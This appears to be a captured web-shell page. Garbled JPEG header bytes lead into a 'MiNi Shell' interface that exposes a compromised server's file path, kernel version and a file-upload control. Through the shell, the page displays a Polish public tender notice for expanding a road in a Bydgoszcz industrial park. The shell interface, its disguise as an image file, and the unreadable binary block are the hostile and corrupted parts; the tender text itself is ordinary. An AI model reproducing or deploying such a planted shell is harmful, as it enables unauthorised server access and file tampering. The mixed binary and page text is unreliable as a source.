JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240409/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240409/0027775601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa wewnętrznej ul. Grzybowej w Bydgoskim Parku Przemysłowo Technologicznym wraz z przebudową skrzyżowania wewnętrznej ul. Grzybowej z ul. Nowotoruńską. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">BYDGOSKI PARK PRZEMYSŁOWO-TECHNOLOGICZNY SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 340011279</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bydgoskich Przemysłowców 6</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-862</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 365 33 10</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@bppt.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.bppt.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Kupno i sprzedaż nieruchomości na własny rachunek. </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa wewnętrznej ul. Grzybowej w Bydgoskim Parku Przemysłowo Technologicznym wraz z przebudową skrzyżowania wewnętrznej ul. Grzybowej z ul. Nowotoruńską. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-12ec760e-f596-11ee-ac52-ee29f86ffd4f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00277756</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/bppt <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a Wykonawcami odbywa się wyłącznie przy użyciu platformy zakupowej Open Nexus pod adresem: https://platformazakupowa.pl/<br/>(dalej również jako: ,,platforma”).Zamawiający przekazuje link do jego profilu na platformie: https://platformazakupowa.pl/pn/bppt,<br/>gdzie będzie możliwość odnalezienia niniejszego postępowania po kliknięciu w zakładkę ,,Postępowania”. Zamawiający może w uzasadnionych przypadkach również komunikować się z Wykonawcami za pomocą poczty elektronicznej: przetargi@bppt.pl. Adres strony internetowej: https://platformazakupowa.pl/pn/bppt</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między zamawiającym a wykonawcami, w szczególności składanie ofert oraz oświadczeń, w tym o których mowa w art. 125 ust. 1 uPzp, podmiotowych środków dowodowych odbywa się przy użyciu środków komunikacji elektronicznej z uwzględnieniem zasad wynikających z rozdziału<br/>IX i X SWZ. 2. Komunikacja pomiędzy Zamawiającym a Wykonawcami, w szczególności składanie oświadczeń, wniosków, zawiadomień oraz przekazywanie informacji odbywa się elektronicznie. 3. W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się wyłącznie przy użyciu platformy zakupowej Open Nexus pod adresem: https://platformazakupowa.pl/ (dalej również jako: ,,platforma”).<br/>4. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP lub ID postępowania).<br/>5. Zamawiający może w uzasadnionych przypadkach również komunikować się z Wykonawcami za pomocą poczty elektronicznej:<br/>przetargi@bppt.pl<br/>6. Oferty oraz oświadczenie wstępne, o którym mowa w art. 125 uPzp, sporządza się, pod rygorem nieważności w formie<br/>elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>7. Zamawiający informuje, że posiadanie konta na platformie jest dobrowolne,<br/>natomiast złożenie oferty w postępowaniu może odbywać się bez posiadania konta.<br/>8. Na stronie platformy znajduje się Instrukcja dla Wykonawców, która określa informacje dotyczące sposobu i formy złożenia oferty,<br/>sposobu komunikowania się Zamawiającego z wykonawcami (poza składaniem ofert), informacje dotyczące sposobu otwarcia ofert<br/>na platformie.<br/>9. Wymagania techniczne i organizacyjne wysyłania oraz odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z platformy<br/>(https://platformazakupowa.pl/strona/1-regulamin ). Składając ofertę<br/>Wykonawca akceptuje Regulamin platformy dla użytkowników (wykonawców).<br/>10. Dokumenty elektroniczne, oświadczenia lub cyfrowe odwzorowanie dokumentu papierowego składane są przez Wykonawcę za<br/>pośrednictwem formularza „wyślij wiadomość”.<br/>11. Maksymalna wielkość wszystkich załączonych plików - 1GB. Dopuszczalna ilość plików - 20. Zalecana maksymalna wielkość<br/>pliku 75MB. Załączone pliki muszą zawierać w nazwie nr postępowania w formacie PR_WT_01_2024.<br/>12. Za datę przekazania zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na platformę.<br/>13. Zamawiający przekazuje link do jego profilu na platformie:<br/>https://platformazakupowa.pl/pn/bppt , gdzie będzie możliwość odnalezienia niniejszego<br/>postępowania po kliknięciu w zakładkę ,,Postępowania”.<br/>14. Zamawiający dopuszcza w szczególności następujący format przesyłanych danych: .pdf, .doc, .docx, .rtf, .xps, .odt.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej RODO, informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Bydgoski Park Przemysłowo Technologiczny sp. z o.o. w Bydgoszczy,<br/>2) Pana/Pani dane nie podlegają współadministrowaniu,<br/>3) Zamawiający powołał inspektora ochrony danych osobowych, z którym można kontaktować się pocztą tradycyjną na adres siedziby Zamawiającego, pod adresem email: biuro@bppt.pl lub pod numerem telefonu 506 012 947,<br/>4) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego nr postępowania: PR/WT/1/2024, pn. Rozbudowa wewnętrznej ul. Grzybowej w Bydgoskim Parku Przemysłowo Technologicznym wraz z przebudową skrzyżowania wewnętrznej ul. Grzybowej z ul. Nowotoruńską,<br/>5) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Prawo zamówień publicznych,<br/>6) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy,<br/>7) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w niniejszym postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodania określonych danych wynikają z ustawy Pzp,<br/>8) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO,<br/>9) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych*,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa<br/>w art. 18 ust. 2 RODO **,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy<br/>uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO,<br/>10) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych<br/>jest art. 6 ust. 1 lit. c RODO, 11) Wykonawca składa do oferty oświadczenie zawarte w formularzu ofertowym w zakresie<br/>wypełnienia obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO,<br/>12) w przypadku gdy Wykonawca nie przekazuje danych osobowych innych niż bezpośrednio<br/>jego dotyczących lub zachodzi wyłączenie stosowania obowiązku informacyjnego,<br/>stosownie do art. 13 ust. 4 lub art. 14 ust. 5 RODO treści oświadczenia Wykonawca nie<br/>składa (usunięcie treści oświadczenia np. przez jego wykreślenie).</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników.<br/>** Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.<br/>Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX uPzp, do upływu terminu do ich wniesienia.<br/>W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO,<br/>wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której<br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w<br/>szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą. Wystąpienie z żądaniem, o którym mowa w art. 18<br/>ust. 1 RODO nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia publicznego.<br/>Zamawiający przetwarza dane osobowe zebrane w postępowaniu o udzielenie zamówienia<br/>publicznego w sposób gwarantujący zabezpieczenie przed ich bezprawnym<br/>rozpowszechnianiem.<br/>Do przetwarzania danych osobowych, o których mowa w art. 10 RODO, mogą być<br/>dopuszczone wyłącznie osoby posiadające pisemne upoważnienie. Osoby dopuszczone do<br/>przetwarzania takich danych są obowiązane do zachowania ich w poufności.<br/>W przypadku danych osobowych zamieszczonych przez Zamawiającego w Biuletynie<br/>Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 RODO, są wykonywane w drodze żądania skierowanego do zamawiającego.<br/>Zasada jawności, o której mowa w art. 18 i 74 ust. 1 uPzp, ma zastosowanie do wszystkich<br/>danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1 RODO, zebranych w<br/>toku postępowania o udzielenie zamówienia publicznego. Ograniczenia zasady jawności, o<br/>których mowa w art. 18 ust. 2-5 uPzp, stosuje się odpowiednio.<br/>Od dnia zakończenia postępowania o udzielenie zamówienia, w przypadku gdy wniesienie<br/>żądania, o którym mowa w art. 18 ust. 1 RODO, spowoduje ograniczenie przetwarzania<br/>danych osobowych zawartych w protokole i załącznikach do protokołu, zamawiający nie<br/>udostępnia tych danych zawartych w protokole i w załącznikach do protokołu, chyba że<br/>zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PR/WT/01/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych w rozumieniu ustawy z dnia 7 lipca 1994 roku Prawo budowlane (t.j. Dz. U. z 2021 r. poz. 2351 z późn. zm.) polegających na rozbudowie wewnętrznej ul. Grzybowej w Bydgoskim Parku Przemysłowo Technologicznym wraz z przebudową skrzyżowania wewnętrznej ul. Grzybowej z ul. Nowotoruńską. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233252-0 - Roboty w zakresie nawierzchni ulic</p> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <p class="mb-0">45233290-8 - Instalowanie znaków drogowych</p> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami:<br/>1)Cena (C) – waga 60% (pkt),<br/>2)Okres udzielania gwarancji jakości na wykonane roboty budowlane (G) – 40%.<br/>2.Sposób przyznawania punktów<br/>1)	opis kryterium cena (C): <br/>Kryterium rozpatrywane będzie na podstawie ceny oferty brutto, zadeklarowanej przez wykonawcę w formularzu ofertowym.<br/>W tym kryterium oferta może uzyskać maksymalnie 60,00 punktów. <br/>Przyznane punkty zostaną zaokrąglone do dwóch miejsc po przecinku.<br/>Liczba punktów (C) w tym kryterium zostanie obliczona wg wzoru:<br/>	C =	Cmin <br/>	Co x 60 pkt<br/>Gdzie:<br/>C – liczba punktów uzyskanych przez ocenianą ofertę w kryterium cena<br/>Cmin – najniższa cena oferty za wykonanie zamówienia <br/>Co – cena ocenianej oferty za wykonanie zamówienia <br/>2)	Opis kryterium okres udzielania gwarancji jakości na wykonane roboty budowlane (G):<br/>Kryterium rozpatrywane będzie na podstawie zadeklarowanej w formularzu ofertowym długości gwarancji udzielonej na wykonane roboty budowlane <br/>Minimalna długość gwarancji – 5 lat. Wykonawca może zaproponować wydłużenie gwarancji do 6 lub 7 lat.<br/><br/>W tym kryterium oferta może uzyskać maksymalnie 40,00 punktów.<br/>Liczba punktów (T) w tym kryterium zostanie przyznana następująco:<br/>7 lat – 40 pkt,<br/>6 lat – 20 pkt,<br/>5 lat – 0 pkt,<br/>Uwaga: <br/>•	okres 7 lat udzielania gwarancji jakości na wykonane roboty budowlane lub więcej otrzyma maksymalną ilość punktów tj. 40,00<br/>•	okres 5 lat udzielania gwarancji jakości na wykonane roboty budowlane lub mniej otrzyma maksymalną ilość punktów tj. 0,00<br/><br/>3.	Ilość punktów (DP) w tym kryterium zostanie obliczona następująco:<br/>4.	Za najkorzystniejszą zostanie uznana oferta, która uzyska łącznie największą liczbę punktów, wyliczoną zgodnie z wzorem: P = C + G gdzie:<br/>P – łączna liczba punktów oferty ocenianej<br/>C – liczba punktów uzyskanych w kryterium cena <br/>G – liczba punktów uzyskanych w kryterium okres udzielania gwarancji jakości na wykonane roboty budowlane <br/>5.	Jeżeli Zamawiający nie będzie mógł wybrać oferty najkorzystniejszej z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę z niższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wzywa wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę. <br/>6.	Wykonawcy, składający oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach. Zamawiający udzieli zamówienia wykonawcy, którego oferta odpowiada wszystkim wymaganiom Pzp oraz SWZ i została uznana jako najkorzystniejsza spośród ofert nieodrzuconych, w oparciu<br/>o podane wyżej kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres udzielania gwarancji jakości na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.Warunki udziału w postępowaniu dotyczą:<br/>a)zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>b)uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w tym zakresie.<br/>c)sytuacji ekonomicznej lub finansowej:<br/>w ramach niniejszego warunku wykonawca ma obowiązek wykazać, że posiada odpowiednie ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmującej przedmiot zamówienia na niewykorzystaną sumę gwarancyjną nie mniejszą niż 10.000.000,00 zł.<br/>d)zdolności technicznej lub zawodowej - niniejszy warunek Zamawiający uzna za spełniony jeżeli wykonawca wykonał w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie:<br/>•co najmniej jedną budowę drogi o wartości brutto nie mniejszej niż 5 000 000 złotych (jedna budowa lub przebudowa) lub trzy budowy o łącznej wartości 5 000 000 złotych z czego co najmniej jedna z nich o wartości 2 500 000 zł. Pojęcie „droga” rozumie się zgodnie z art. 4 pkt 2) ustawy z dnia 21 marca 1985 r. o drogach publicznych (j.t. 